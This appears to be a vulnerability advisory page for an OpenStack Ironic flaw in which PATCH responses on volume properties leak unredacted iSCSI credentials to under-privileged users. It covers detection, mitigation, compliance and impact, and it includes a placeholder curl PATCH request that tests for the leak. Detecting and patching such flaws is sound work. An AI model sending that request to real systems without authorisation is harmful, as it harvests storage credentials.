Detection Guidance

This vulnerability can be detected by monitoring API responses from OpenStack Ironic for unredacted sensitive information, such as iSCSI credentials, especially in PATCH responses updating volume properties.

Specifically, you can test if a user with permissions to update volume properties but without permissions to view target properties can retrieve sensitive data via the PATCH API call.

Commands to detect this might involve using OpenStack CLI or direct API calls to perform PATCH requests on volume properties and inspecting the response for exposed credentials.

• Use curl or an HTTP client to send a PATCH request to the Ironic API endpoint for volume properties as a user with limited permissions.
• Inspect the response for unredacted sensitive fields such as iSCSI credentials.
• Example curl command (replace placeholders accordingly):
• curl -X PATCH https://<ironic-api-endpoint>/v1/volumes/<volume-id> -H "X-Auth-Token: <token>" -d '{"volume_properties": {"some_property": "new_value"}}' -H "Content-Type: application/json"

If the response contains sensitive information that should be redacted, the vulnerability is present.

Useful 0 Not Useful 0

Mitigation Strategies

Immediate mitigation steps include applying the patches provided by the OpenStack Ironic project that enforce consistent redaction of sensitive properties in all API operations.

Until patches are applied, restrict permissions so that users who can update volume properties also have the permission to view target properties, preventing unauthorized access to sensitive data.

Additionally, review and tighten Role-Based Access Control (RBAC) policies to limit exposure.

• Apply official patches or updates from OpenStack Ironic that fix the redaction issue.
• Restrict user permissions to avoid granting volume update rights without view-target-properties permission.
• Monitor API responses for sensitive data exposure as a temporary detection measure.

Useful 0 Not Useful 0

Compliance Impact

This vulnerability in OpenStack Ironic exposes unredacted sensitive information, such as iSCSI credentials, to users who are authorized to update volume properties but lack permission to view sensitive details. Such exposure of sensitive credentials can lead to unauthorized access to storage volumes.

The leakage of sensitive information could potentially violate compliance requirements under common standards and regulations like GDPR and HIPAA, which mandate the protection of sensitive data and restrict unauthorized access.

Therefore, organizations using affected versions of OpenStack Ironic may face increased risk of non-compliance due to this vulnerability if the exposed information includes regulated sensitive data.

Useful 0 Not Useful 0

Executive Summary

CVE-2026-54421 is a security vulnerability in OpenStack Ironic up to version 35.0.1 where sensitive information, such as iSCSI credentials, can be exposed in API responses when a user applies a PATCH request to update volume properties.

The root cause is that the policy check which restricts access to sensitive volume properties is enforced during read operations but missing during write operations like PATCH and POST. This allows users with permissions to create or update volumes but without permission to view sensitive properties to still receive unredacted sensitive data in the API response.

While the POST operation is not considered a security issue, the PATCH operation can leak sensitive credentials, potentially allowing unauthorized access to storage volumes.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can lead to the exposure of sensitive information such as iSCSI credentials to users who should not have access to them.

If exploited, attackers or unauthorized users with certain update permissions could retrieve credentials that enable them to connect to storage volumes outside the intended provisioning flow.

This exposure could compromise the confidentiality of storage systems and potentially lead to unauthorized data access or manipulation.

Useful 0 Not Useful 0